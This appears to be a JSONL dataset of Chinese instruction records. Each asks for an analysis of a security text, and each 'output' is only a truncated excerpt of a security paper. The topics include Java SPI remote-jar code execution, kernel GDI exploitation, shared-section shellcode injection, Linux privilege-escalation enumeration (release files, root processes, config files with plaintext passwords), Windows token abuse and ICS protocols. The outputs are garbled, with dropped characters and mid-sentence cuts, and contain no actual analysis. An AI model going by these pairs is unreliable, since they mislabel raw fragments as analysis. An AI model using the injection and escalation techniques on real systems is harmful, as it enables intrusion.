Aereo (RIP)  Cloud", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nScriptEngineManager代码执行 ScriptEngineManager 是用于 java 与 js 之间的相互调用这个类在 jdk6 中存在 初始化 ScriptEngineManager 类有两个初始化方法一个有参一个无参有参的初始化方法是传递一 个 ClassLoader 无参的构造方法是使用进程本身的 CLassLoader  这里可以回顾一下 SnakeYaml 反序列化其中就用到了 ScriptEngineManager 类传递一个 URLClassLoader 然后利用 SPI 机制达到代码执行所以此处可以先回顾一下这个利用过程 SnakeYaml 反序列化中的初始化 SPI SPI 全称为 Service Provider Interface 是一种服务发现机制它通过在 ClassPath 路径 下的 META-INF/services 文件夹查找文件自动加载文件里所定义的类参考文章深入理解SPI 机制 举个例子 首先定义接口完成两个实现类 在 classpath 中添加SPI搜索文件 通过 ServiceLoader.load 或者 Service.providers 两个方法来拿到实现类的实例 ScriptEngineManager 中 SPI 的过程 首先要创建一个类实现接口 javax.script.ScriptEngineFactory 至于为啥先按下不表然后 和上面一样添加一个 SPI 的搜索文件注意这个文件名是实现的接口的全类名然后上一个实验的 内容最后清空一下免得出错之后打包成 jar 通过 ScriptEngineManager 触发 SPI 机制然后弹计算器 成功远程加载了 jar 包弹出计算机 debug 一下 new ScriptEngineManager(urlClassLoader) -> init(loader); -> initEngines(loader); - > getServiceLoader(loader) 整个流程便是这个样子的并不复杂在 getServiceLoader(loader) 中通过 ServiceLoader.load 的方式去获取实现类实例这里可以 看到传递的类对象是 ScriptEngineFactory 所以要实现的接口也是这一个 之后遍历这个迭代器操作和实验上的一样在 next() 方法中会创建类对象并且创建一个对 象这就可以触发我们写的恶意代码了 好了这个我们研究完了之后来看看怎么通过 ScriptEngineManager 执行命令吧 ScriptEngineManager 的使用 js 风格的 java 人麻了", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# MVC --- ## 什么是 MVC 框架 假设我们已经编写了几个JavaBean ```java public class User { public long id; public String name; public School school; } public class School { public String name; public String address; } ``` 在 `UserServlet` 中我们可以从数据库读取 UserSchool 等信息然后把读取到的 JavaBean 先放到 `HttpServletRequest` 中再通过 `forward()` 传给 `user.jsp` 处理 ```java @WebServlet(urlPatterns = \"/user\") public class UserServlet extends HttpServlet { protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { // 假装从数据库读取: School school = new School(\"No.1 Middle School\", \"101 South Street\"); User user = new User(123, \"Bob\", school); // 放入Request中: req.setAttribute(\"user\", user); // forward给user.jsp: req.getRequestDispatcher(\"/WEB-INF/user.jsp\").forward(req, resp); } } ``` 在 `user.jsp` 中我们只负责展示相关 JavaBean 的信息不需要编写访问数据库等复杂逻辑 ```java <%@ page import=\"bean.*\"%> <% User user = (User) request.getAttribute(\"user\"); %> <html> <head> <title>Hello World - JSP</title> </head> <body> <h1>Hello <%= user.name %>!</h1> <p>School Name: <span style=\"color:red\"> <%= user.school.name %> </span> </p> <p>School Address: <span style=\"color:red\"> <%= user.school.address %> </span> </p> </body> </html> ``` * 需要展示的 User 被放入 `HttpServletRequest` 中以便传递给 JSP因为一个请求对应一个 HttpServletRequest我们也无需清理它处理完该请求后 `HttpServletRequest` 实例将被丢弃 * 把 `user.jsp` 放到 `/WEB-INF/` 目录下是因为 `WEB-INF` 是一个特殊目录Web Server 会阻止浏览器对 `WEB-INF` 目录下任何资源的访问这样就防止用户通过 `/user.jsp` 路径直接访问到 JSP 页面 * JSP 页面首先从 `request` 变量获取 `User` 实例然后在页面中直接输出此处未考虑 HTML 的转义问题有潜在安全风险 在浏览器访问 http://localhost:8080/user请求首先由 `UserServlet` 处理然后交给 user.jsp 渲染 我们把 `UserServlet` 看作业务逻辑处理把 User 看作模型把 `user.jsp` 看作渲染这种设计模式通常被称为 MVCModel-View-Controller即 `UserServlet` `作为控制器ControllerUser` 作为模型Model`user.jsp` 作为视图View整个 MVC 架构如下 ```  >Controller: UserServlet        Browser Model: User  <          View: user.jsp   ``` 使用 MVC 模式的好处是Controller 专注于业务处理它的处理结果就是 ModelModel 可以是一个 JavaBean也可以是一个包含多个对象的 MapController 只负责把 Model 传递给 ViewView 只负责把 Model 给 渲染 出来这样三者职责明", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOutsmarting the Smart City DISCOVERING AND ATTACKING THE TECHNOLOGY THAT RUNS MODERN CITIES & 2 Page Researcher Bios  Daniel Crowley (@dan_crowley)  Research Baron at IBM X-Force Red  Pen tester since 2004  Locksport enthusiast and past competition winner  Actually holds the title of Baron (in Sealand) 3 Page Researcher Bios  Jennifer Savage (@savagejen)  Security Researcher at Threatcare  Black Hat review board member  Experience includes:  development  vulnerability assessment  vulnerability management  penetration testing  security research 4 Page Researcher Bios  Mauro Paredes (@mauroparedes)  Managing Consultant at IBM X-Force Red  Passion for security flaws and their corrections  Formerly developer, net/server admin, security architect  Pen tester for many years  20+ years infosec experience in multiple industries 5 Page What kind of tech makes a city smart?  Industrial Internet of Things  Urban Automation  Public Safety / Emergency Management  Intelligent Transportation Systems  Metropolitan Area Networks 6 Page Limited citizen privacy and risk management options  You dont have to buy an Alexa  You can buy a non-smart TV  You can buy a feature phone (or forego a cell phone)  You can buy an ancient car  Can you move to a city that isnt smart? 7 Page V2I, V2V, OBD-III and DSRC Connected vehicles communicate with each other, and with city infrastructure, as travel occurs. The proposed OBD-III standard raises privacy and due process concerns. 8 Page Hangzhou City Brain In China, people have less concern with privacy, which allows us to move faster - Xian-Sheng Hua, manager of AI at Alibaba at World Summit AI in 2017 9 Page Smart streetlights with cameras GEs Bill Ruh says its up to each city to set policies around the data collected by the sensors and how it can be used. 10 Page Facial recognition In 2017 the former head of Singapores civil service Peter Ong said Singapore wants to deploy facial recognition technology to all 110,000 lampposts in the country. 11 P", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nResearch Demystifying Kernel Exploitation by Abusing GDI Objects Saif El-Sherei saif@sensepost.com ! Demystifying Kernel Exploitation by Abusing GDI Objects 2017-07-18! ! ! ! ! pg.!2! ! Introduction In this paper, we will discuss integer overflows that lead to Kernel Pool memory corruption. We will go through discovery, triggering, and exploiting the identified issues, by abusing two GDI objects, the bitmap and palette objects. The concepts presented in this paper represent how I understood and tackled them, they might not be very scientific in that sense. Standing on the Shoulders of Giants  Nicolas Economou Economonu and Diego Juarez Juarez Abusing GDI for ring 0: https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives  360 Vulcan: https://cansecwest.com/slides/2017/CSW2017_PengQiu- ShefangZhong_win32k_dark_composition.pdf  K33n team: https://www.slideshare.net/PeterHlavaty/windows-kernel-exploitation-this-time- font-hunt-you-down-in-4-bytes  J00ru, Halvar Flake, Tarjei Mandt, Halsten, Alex Ionescu, Nikita Terankov and many others. The Setup  IDA Pro.  Zynamics BinDiff.  VirtualKD (much love).  WinDbg  GDIObjDump WinDbg Extension  VmWare Worksation: - Windows 8.1 x64. - Windows 7 SP1 x86. ! Demystifying Kernel Exploitation by Abusing GDI Objects 2017-07-18! ! ! ! ! pg.!3! ! WinDbg Pool Analysis Tips !poolused This command can be used to view the pool usage of a certain Pool tag or for a certain Pool type. !poolfind This command is used to find all locations of allocated objects of the specified Pool tag. ! Demystifying Kernel Exploitation by Abusing GDI Objects 2017-07-18! ! ! ! ! pg.!4! ! !pool This command is used to view the Pool page where the specified address is located in. ! Demystifying Kernel Exploitation by Abusing GDI Objects 2017-07-18! ! ! ! ! pg.!5! ! Kernel Pool Kernel Pool Types The kernel Pool is a sort of Heap memory that is used by the kernel, and it has many types [1], the most used are:  Desktop Heap: primarily used for Desk", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前 常规的shellcode注般是通过 VirtualAllocEx , WriteProcessMemory 和 CreateRemoteThread 来实现的但是这种式是被安全软件重点监控的同时微软提供的 ETW接也是可以轻易检测出上述式进代码注的痕迹本的核是讲解怎么利具 备 RWX-S 权限且身有签名的DLL进种较隐蔽的shellcode注 并讲解具体的代码实现以及在写代码实现的过程中遇到的坑本法是由章提出的https: //billdemirkapi.me/sharing-is-caring-abusing-shared-sections-for-code-injection/ 详情可 以参考此章 基础知识回顾 PE件的每个section都具备的权限表明他被映射到虚拟内存之后的操作权限也就是 SECTION_CHARACTERISTICS 这个字段占四个字节 通常来讲 .text 节区只具备 IMAGE_SCN_MEM_READ 和 IMAGE_SCN_MEM_EXECUTE 权 限 .data 节区般只具备 IMAGE_SCN_MEM_READ , IMAGE_SCN_MEM_WRITE 权限 当PE 件被映射到内存后对个不具备 IMAGE_SCN_MEM_WRITE 权限的节区进写操作或者对 个没有 IMAGE_SCN_MEM_EXECUTE 的节区进执时都会报异常 看微软的档document, 会发现个权限叫做 IMAGE_SCN_MEM_SHARED  那共享到底意味 着什么据测试显示具备此权限的section会被当前系统所有的进程共享如果进程A和进 程B都加载了具备IMAGE_SCN_MEM_SHARED权限的模块C那么模块C的此section在系 统层上只有份这也就意味着A进程对C的修改有IMAGE_SCN_MEM_WRITE权限 会影响到B进程 那么思路就来了如果个模块的某个节区是具备 RWX-S 权限我只需要把它加载到进程A 中然后修改它的内容为恶意代码然后想办法让他加载到进程B中就可以实现在B中执 恶意代码了 那这种利主要分为如下个步骤 于怎么去找个具备 RWX-S权限的签名dll原作者也提供了个yara规则在virustotal上 来筛选不再细说: 这提供个我找到的DLL: https://www.virustotal.com/gui/file/855277c0aeea89d17a07e27 e9cf79c98b26e70e8e57561c4b592097e0032c4e9 以后的代码都是基于此DLL完成的 1. 找到个有签名的并且具备 RWX-S 权限的dll(不具备RWX-S权限也可以可以patch系 统内的已签名的dll但是这样会破坏签名不够隐蔽) 2. 将DLL加载到进程A的内存修改 RWX-S 权限的section的代码进patch 3. 调 SetWindowsHookEx使DLL中的某个函数指针作为 HOOKPROC 参数使得DLL被 注到标进程B中 4. 标进程B加载DLL并触发恶意代码执 import \"pe\" rule RWX_S_Signed_Search { meta: description = \"Detects RWX-S signed binaries. This only verifies that the image contains a signature, not that it is valid.\" author = \"Bill Demirkapi\" condition: for any i in (0..pe.number_of_sections - 1): ( (pe.sections[i].characteristics & pe.SECTION_MEM_READ) and (pe.sections[i].characteristics & pe.SECTION_MEM_EXECUTE) and (pe.sections[i].characteristics & pe.SECTION_MEM_WRITE) and (pe.sections[i].characteristics & pe.SECTION_MEM_SHARED) ) and pe.number_of_signatures > 0 } 其实这最关键的是步骤主要涉及两个问题 1. patch什么位置可以保证此DLL被进程B加载之后恶意代码定会被执 2. patch成什么样的代码才能保证进程B不会因为运异常崩溃 先回答问题1当前DLL被进程B加载后定会被执的有两个函数分别是 DllMain 和 设 置给 SetWindowsHookEx 的消息hook函数, 我觉得这两个函数中 DllMain 更", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nR I C K Y H I L L D E F C O N 2 1 8 / 3 / 2 0 1 3 Phantom Network Surveillance UAV / Drone 1 About Me  Security Consultant, D.C. Area  Specialties: Wireless & SCADA Security  US Govt. & Commercial  Previous DEFCON Talks: WarRocketing & WarBallooning, (over Las Vegas ;-)  Hobbies: R/C helis, Deep Sea Fishing 2 What Talk is NOT About  Having UR Dry Cleaning Delivered -> 3 Outline  Intro - Aerial Wireless Surveillance  Past attempts: Balloons, Rockets, UAVForge  New Technology: The Phantom Drone  Building the Network Surveillance Drone  Flights & Results  Conclusion 4 What this is Really About  Aerial, wireless (802.11) network surveillance Past Attempts:  DARPA - UAVForge, 2011  Blackhat 2011: WASP spy drone 5 UAVForge Perch and Stare  OK, so this hawk doesnt have a Pineapple, but hes definitely perfected the technique! -> 6 But I luv Helis & Drones: Why did UAVForge fail?  143 teams from 153 countries competed -> No One Won.  Factors: - Govt. required ops beyond LoS - Limited FPV capabilities - Ambitious, autonomous operations - Some highlights (uavforge.net) 7 UAVForge Crashes 8 Meet THE DJI Phantom  DJI Innovations introduced the Phantom JAN 2013  It quickly gained a reputation for being the most stable drone platform in the air today  Features: GPS Auto Return to Home Payload: up to 400 grams $679. UAVForge Dones: $2K-9K 9 Whats New since 2011?  Technology has improved dramatically:  Tiny computers: Cotton Candy (30 gr.)  CC: Bluetooth, HDMI, 802.11 capable  Wifi Pineapple: remote 3G, 4G  DJI Phantom = the first consumer quality drone that is easily flyable by the average person. 10 TechnoLust Overcomes Me: Lets build this!  Designed & Built 2 payloads:  Cotton Candy + WiSpy or KillerBee  Flying Pineapple = Hak5 Pineapple + GSM 3G/4G 11 Site Survey Payload  Cotton Candy makes a perfect headless computer  Apple Bluetooth KB & Mouse detach instantly  ARM processor runs Ubuntu or Android O/S  1.2 GHz ARM Cortex-A9 CPU, 1GB of RAM, image on microSD  Wireless Tools: Ki", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n目录 前言 2 1-linux提权描述 4 2-基本Linux权限提升前的信息收集 6 3-linux提权自动信息收集 18 4-linux提权-内核漏洞提权 19 5-1-linux-历史漏洞提权 24 5-linux提权-利用以root权限运行的服务 25 6-Linux提权-NFS权限弱 27 7-linux提权-Suid和Guid配置错误 32 8-linux提权滥用SUDO 41 9-linux提权-利用.路径配置错误 45 10-linux提权利用定时任务Cron jobs 47 11-linux提权-通配符注入 54 渗透测试 红队攻防 免杀 权限维持 等等技术 及时分享最新漏洞复现以及EXP 国内外最新技术分享!!! 进来一起学习吧 本文由黑白天安全团队李木整理 水平有限错误还望大佬多多包涵 仅供学习研究请遵守法律不要进行非法攻击 微信扫一扫关注公众号 大多数计算机系统设计为可与多个用户一起使用特权是指允许用户执行 的操作普通特权包括查看和编辑文件或修改系统文件特权升级意味着 用户获得他们无权获得的特权这些特权可用于删除文件查看私人信息 或安装不需要的程序例如病毒通常当系统存在允许绕过安全性的错 误或对使用方法的设计假设存在缺陷时通常会发生这种情况 特权提升是利用操作系统或软件应用程序中的错误设计缺陷等等来获得 对通常受到应用程序或用户保护的资源的更高访问权限的行为结果是 具有比应用程序开发人员或系统管理员想要的特权更多的应用程序可以执 行未经授权的操作 特权升级有两种类型水平和垂直在水平升级中您从一个用户转移到 另一个用户在这种情况下两个用户都是通用的而在垂直方式中我 们将特权从普通用户提升为管理员 简单来说就是 即用户无法访问读取/写入/执行不允许访问的文件但是超级用户 root可以访问系统上存在的所有文件 为了更改任何重要的配置或进 行进一步的攻击首先我们需要在任何基于Linux的系统上获得root用户 访问权限 为什么我们需要执行特权升级 读/写任何敏感文件 重新启动之间轻松保持 插入永久后门 特权升级所使用的技术 我们假设现在我们在远程系统上有外壳根据我们渗透进去的方式我们 可能没有 root特权以下提到的技术可用于获取系统上的 root访问权 限 内核漏洞 以root身份运行的程序 已安装的软件 弱密码/重用密码/纯文本密码 内部服务 Suid配置错误 滥用sudo权利 由root调用的可写脚本 路径配置错误 Cronjobs 卸载的文件系统 信息收集是关键 Linux特权提升的TIps 信息信息更多的信息收集信息收集是整个渗透测试过程的 整理信息分析收集的信息和整理信息 搜索漏洞- 知道要搜索什么以及在哪里可以找到漏洞利用代码 修改代码- 修改漏洞利用程序使其适合目前的渗透并非每种漏洞都能 为现成的每个系统工作漏洞看环境 尝试攻击- 为很多尝试和错误做好准备 操作系统 什么是发行类型什么版本的 什么是内核版本是64位吗 从环境变量中可以收集到什么信息环境变量中可能存在密码或API密钥 cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- cat /etc/profile cat /etc/bashrc 1 2 3 4 1 2 3 4 5 1 2 路径Path) 如果您对该变量内的任何文件夹都具有写权限则可以劫持某些库或二进制 文件PATH echo $ PATH 有打印机吗 应用与服务 哪些服务正在运行哪个服务具有哪个用户特权 root正在运行哪些服务在这些易受攻击的服务中值得仔细检查 安装了哪些应用程序他们是什么版本的他们目前在运行吗 cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set lpstat -a ps aux ps -ef top cat /etc/services ps aux | grep root ps -ef | grep root ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l 3 4 5 6 1 1 2 3 1 1 2 3 服务设置是否配置错误是否附有脆弱的插件 计划了哪些工作计划任务 是否有纯文本用户名和/或密码 检查Web服务器连接到数据库的文件config.php或类似文件 检查数据库以获取可能被重用的管理员密码 r", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploitation Detection System (EDS) Introduction: in the last several years, the exploits become the strongest cyber weapons in all cyber warfare. The exploit developer/vulnerability researcher become the nuclear scientist of the digital world. Most of Attacks now are APT attacks and they are based on attacking from behind. they attack using a spear phishing and client-side attacks which bypass all of security defenses and appliances nowadays. In this white paper, I will talk about a new concept named \"Exploitation Detection System\" which will defend against the APT Attacks and a new security mitigation tool which is based on co-operation between several mitigations to cover the weaknesses of each other and it's based on monitoring the memory changes which doesn't decrease the performance of the running application and creates a multi-layer protection with the regular mitigations. the EDS consist of 2 payload detection tools for detecting shellcodes and rop chains and includes several mitigations tools for stack overflow, heap spray, use after free and other attack techniques which we will describe in the white paper. Exploitation Detection System as a Concept: Why EDS? The next generation of attacks, the hackers nowadays attack a company from its client. they attack using spear-phishing, client-side attacks and exploits to get internally inside the network of the company and from inside these clients they attack the servers and get their information. The Attackers use new undetectable malware (which is very easy for the signature-based AVs) and use HTTP and HTTPS to bypass the Firewalls, IDS and IPS tools to connect to the Attacker and sometimes they use legitimate websites to bypass threat intelligence tools and DNS analysis. from these malwares, the attacker tries to get into the server by stealing the passwords using sniffing or whatever they can do, or even hack the server to get into your information and databases. Most of security defenses and security tools ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTechnical Service Bulletin: FXR-14 Modifying GE MVS VHF Group 2 150  174 MHz for Amateur Radio Applications in the 219  220 & 222  225 MHz Band A FluX Research project in several phases Release Date: 04-01-2011 Last Update: v1.2 03-01-2011 By: Matt Krick, K3MK matt@kgmn.net Radio Model #: GE MVS - NPFH3OSS Warning: Please be aware that this document may contain several omissions and or typographical errors, continue reading at your own risk. Background: Special thanks to Mohave Amateur Radio Club, K7MPR for providing the radios for experimentation. The following LBIs may be helpful: LBI-31919E VHF High band 40 watt MVS maintenance manual LBI-31920D VHF High band RF board 19D901835G2 (150-174 MHz) LBI-31921C VHF High band Power Amplifier board 19C851540G2 (150-174 MHz) LBI-31922D Audio board 19D901870G1 LBI-31924F MDR, MTD, MVS, TMX-8825 System Board 19D901891G1 LBI-31926C Service section for VHF high band combinations LBI-31927D MVS Operators manual Covers 2 channel, 8 or 16 channel, scan, selective calling (SelCal) and PA operation LBI-38387B MVS Front cap assembly 19D901913G1 (this is the front panel) LBI-38465B Remote mount option 19A705306G3 LB-I38899 MVS / MCS / TMX-8712 / TMX-8310 Logic boards 19D901690G11 Phase 0: Preparations Make sure the radio to be converted is in good working order on its original frequencies before attempting conversion to Amateur Radio use. Phase 1: Operating Frequency Reprogramming Option 1: Hack Original GE MVS v3.0 software to allow out of range programming. Copy MVS.EXE to MVS220.EXE Using a suitable hex editor such as XVI32, Edit MVS220.EXE and make the following changes: Hex Address Original Data New Data &H1A328 C0 62 00 60 &H1A33F C0 65 20 6C &H1B8E9 C0 62 00 60 &H1B8F1 C0 65 20 6C This changes the programming range of the software to allow 128 to 225 MHz. Transmit frequencies will show true, Receive frequencies will now have to be programmed minus 90 MHz. I.E. 223.500 MHz RX is programmed as 133.500 MHz. Option 2: Use alternat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 [show me your privileges and I will lead you to SYSTEM] Andrea Pierini, Paris, June 19th 2019 2 dir /a /r %USERPROFILE%  Cyclist & Scuba Diver, Father & Husband  IT Architect & Security Manager  Long time experience  InfoSec addicted  Windows Server & Linux early adopter whoami /priv - Andrea Pierini @decoder_it | decoder.ap@gmail.com | https://decoder.cloud | https://github.com/decoder-it Cyber Saiyan Member of: 3 dir /a /r %USERPROFILE%  Cyclist & Scuba Diver, Father & Husband  IT Architect & Security Manager  Long time experience  InfoSec addicted  Windows Server & Linux early adopter whoami /priv - Andrea Pierini @decoder_it | decoder.ap@gmail.com | https://decoder.cloud | https://github.com/decoder-it Cyber Saiyan The good old days Member of: 4 Why this talk  Escalating privileges via Windows Privilege abusing & Token manipulation techniques are often not considered and/or misunderstood  Some Windows privilege manipulations techniques are not well documented  So I decided to dig deeper  Abusing Token Privileges For Windows Local Privilege Escalation (Bryan Alexander & Stephen Breen) a great article which inspired me a lot! whoami /priv - Andrea Pierini 5 Agenda  Intro to Windows Privileges & Tokens  How to get them?  Interesting privileges for escalation:  SeDebug  SeRestore & SeBackup & SeTakeOwnership  SeTcb & SeCreateToken  SeLoadDriver  SeImpersonate & SeAssignPrimaryToken  From Rotten Potato to Juicy Potato  Prevention  Final thoughts whoami /priv - Andrea Pierini 6 What are Windows Privileges?  A privilege is the right of an account, such as a user or group account, to perform various system-related operations on the local computer, such as shutting down the system, loading device drivers, or changing the system time (msdn.microsoft.com)  Some Users/Groups have predefined privileges  Privileges are managed through the User Right Assignment of the Local Policies, but you can play with them using the Windows APIs too  Some privileges can override permissi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nConducting Massive Attacks With Open Source Distributed Computing By Alejandro Caceres (@DotSlashPunk) DEF CON 21 How to (almost) get fired from your job Step 1: Speak at a hacker con on your open source community-focused side project (PunkSPIDER) - Combined distributed computing (my main area of research) with web application fuzzing - Was pretty cool (if I do say so myself) Step 2: Have a friend of a high-level executive at your company stumble upon talk at said con Step 3: Have said friend confuse community-focused web app security side project for a cyber weapon and tell executive that youre building a cyber weapon in your spare time. Step 4:  DEF CON 21 Why did I just tell you that story?  It was the inspiration for this talk  got me thinking about the following:  What would it take to build true distributed network attack tools?  Where can distributed computing help the most?  How can one simply and quickly build distributed attack tools to do whatever it is youre into  We wont judge - but dont do anything illegal. Seriously. Please? Ah whatever, youre not listening anyway.  My goal is simply to explore some of the possible answers to these questions DEF CON 21 Distributed Computing Today  Great advances in distributed computing lately  Apache Hadoop  Googles MapReduce papers and implementation details  Weve seen some great stuff come out of this  Data Analytics  Super fast data processing (for faster analytics)  Counting things (analytics)  Analyzing things (analytics)  You might notice a trend in the above uses of distributed computing or big data technologies if youre into buzzwords (looking at you Splunk, IBM, EMC, etc. etc. etc.)  Spoiler: were mostly using it for data analytics  This bores me DEF CON 21 Distributed Computing In the (distant) Future  My main thing is using distributed computing / big data technologies for massive attacks  Most of my research thus far has been in application-level attacks  I want to dive into this area and see whats possib", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 工控协议 <p align=\"center\"> <img src=\"../../../assets/img/banner/工控协议.jpg\" width=\"90%\"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 大纲 - [工控协议](#工控协议) - [免责声明](#免责声明) - [大纲](#大纲) - [S7Comm](#s7comm) - [S7comm-plus](#s7comm-plus) - [TPKT](#tpkt) - [COTP](#cotp) - [Ethernet/IP](#ethernetip) - [Modbus](#modbus) - [Modbus功能码](#modbus功能码) - [Profinet](#profinet) - [PROFIBUS](#profibus) - [DNP3](#dnp3) - [ICCP](#iccp) - [OPC](#opc) - [Niagara-Fox](#niagara-fox) - [BACnet](#bacnet) - [GE-SRTP](#ge-srtp) - [HART-IP](#hart-ip) - [PCWorx](#pcworx) - [MELSEC-Q](#melsec-q) - [OMRON-FINS](#omron-fins) - [Crimson-v3](#crimson-v3) - [Codesys](#codesys) - [ProConOS](#proconos) - [moxa-nport](#moxa-nport) --- ## S7Comm S7CommS7 Communication是西门子专有的协议是西门子 S7 通讯协议簇里的一种 > shodan : \"port:102\" **相关文章** - [工控安全 | 西门子通信协议S7COMMPart 1](https://www.freebuf.com/articles/ics-articles/188159.html) - [工控安全 | 西门子通信协议S7COMMPart 2](https://www.freebuf.com/articles/ics-articles/188606.html) - [S7comm - The Wireshark Wiki](https://wiki.wireshark.org/S7comm) - [西门子通信协议S7Comm](https://web.archive.org/web/20190925060928/https://laucyun.com/3aa43ada8cfbd7eca51304b0c305b523.html) **相关资源** - [(完整版)西门子S7协议解析](https://wenku.baidu.com/view/c29ee884366baf1ffc4ffe4733687e21ae45ff5f.html#) **S7comm 协议** - [S7comm 相关](./S7comm相关.md) **抓包分析** - 见 [Wireshark笔记](../BlueTeam/实验/流量分析.md#s7comm) 案例中 s7comm 部分 **仿真搭建** - [siemens](./PLC攻击.md#siemens) --- ## S7comm-plus **相关文章** - [西门子S7comm-plus通信过程及重放攻击分析](https://www.freebuf.com/articles/ics-articles/220239.html) --- ## TPKT TPKT 协议是应用层数据传输协议介于 TCP 和 COTP 协议之间这是一个传输服务协议主要用来在 COTP 和 TCP 之间建立桥梁 随着 TCP 越来越流行大约在1995年左右需要一种在 TCP 传输之上封装 ISO 服务的机制因为这两个协议都具有相似的任务而 COTP 如今已经过时了 TPKT 使用 TCP 作为其传输协议 TPKT 通信的 TCP 端口是 102 TPKT 是一种 \"封装 \"协议它在自己的数据包的数据 Payload 中携带 OSI 数据包然后将产生的结构传递给 TCP至此数据包被当作 TCP/IP 数据包处理传递数据给 TPKT 的 OSI 程序并不知道自己的数据将通过 TCP/IP 进行传输因为 TPKT 模拟了 OSI 协议传输服务接入点(TSAP) 其中TPKT 的结构为 - 0 (Unsigned integer, 1 byte): Version版本信息 - 1 (Unsigned inte", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndf === 显示磁盘的相关信息 ## 补充说明 **df命令** 用于显示磁盘分区上的可使用的磁盘空间默认显示单位为KB可以利用该命令来获取硬盘被占用了多少空间目前还剩下多少空间等信息 ### 语法 ```shell df(选项)(参数) ``` ### 选项 ```shell -a或--all包含全部的文件系统 --block-size=<区块大小>以指定的区块大小来显示区块数目 -h或--human-readable以可读性较高的方式来显示信息 -H或--si与-h参数相同但在计算时是以1000 Bytes为换算单位而非1024 Bytes -i或--inodes显示inode的信息 -k或--kilobytes指定区块大小为1024字节 -l或--local仅显示本地端的文件系统 -m或--megabytes指定区块大小为1048576字节 --no-sync在取得磁盘使用信息前不要执行sync指令此为预设值 -P或--portability使用POSIX的输出格式 --sync在取得磁盘使用信息前先执行sync指令 -t<文件系统类型>或--type=<文件系统类型>仅显示指定文件系统类型的磁盘信息 -T或--print-type显示文件系统的类型 -x<文件系统类型>或--exclude-type=<文件系统类型>不要显示指定文件系统类型的磁盘信息 --help显示帮助 --version显示版本信息 ``` ### 参数 文件指定文件系统上的文件 ### 大小格式 显示值以 `--block-size` 和 `DF_BLOCK_SIZE``BLOCK_SIZE` 和 `BLOCKSIZE` 环境变量中的第一个可用 `SIZE` 为单位 否则单位默认为 `1024` 个字节如果设置 `POSIXLY_CORRECT`则为`512` SIZE是一个整数和可选单位例如10M是10 * 1024 * 1024 单位是KMGTPEZY1024的幂或KBMB...1000的幂 ### 实例 查看系统磁盘设备默认是KB为单位 ```shell [root@LinServ-1 ~]# df 文件系统 1K-块 已用 可用 已用% 挂载点 /dev/sda2 146294492 28244432 110498708 21% / /dev/sda1 1019208 62360 904240 7% /boot tmpfs 1032204 0 1032204 0% /dev/shm /dev/sdb1 2884284108 218826068 2518944764 8% /data1 ``` 使用`-h`选项以KB以上的单位来显示可读性高 ```shell [root@LinServ-1 ~]# df -h 文件系统 容量 已用 可用 已用% 挂载点 /dev/sda2 140G 27G 106G 21% / /dev/sda1 996M 61M 884M 7% /boot tmpfs 1009M 0 1009M 0% /dev/shm /dev/sdb1 2.7T 209G 2.4T 8% /data1 ``` 查看全部文件系统 ```shell [root@LinServ-1 ~]# df -a 文件系统 1K-块 已用 可用 已用% 挂载点 /dev/sda2 146294492 28244432 110498708 21% / proc 0 0 0 - /proc sysfs 0 0 0 - /sys devpts 0 0 0 - /dev/pts /dev/sda1 1019208 62360 904240 7% /boot tmpfs 1032204 0 1032204 0% /dev/shm /dev/sdb1 2884284108 218826068 2518944764 8% /data1 none 0 0 0 - /proc/sys/fs/binfmt_misc ``` 显示 `public` 目录中的可用空间量如以下输出中所示 ```shell df public # Filesystem 1K-blocks Used Available Use% Mounted on # /dev/loop0 18761008 15246924 2554392 86% /d Avail ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup Plaid CTF 2016 Team: c7f.m0d3, akrasuski1, cr019283, nazywam, shalom, mnmd21891, msm, rev ### Table of contents * [Rabit (Crypto)](crypto_rabit) * [Tonnerre (Crypto)](crypto_tonnerre) * [Pixelshop (Web)](web_pixelshop) * [Hevc (Misc)](misc_hevc) * [Morset (Misc)](misc_morset) * [The stuff (Misc)](misc_the_stuff) * [Untitled (Misc)](misc_untitled) * [Pound (Pwn)](pwnable_pound) * [Quixotic (Re)](reversing_quixotic)", "category": "text_analysis", "source": "security_papers"}
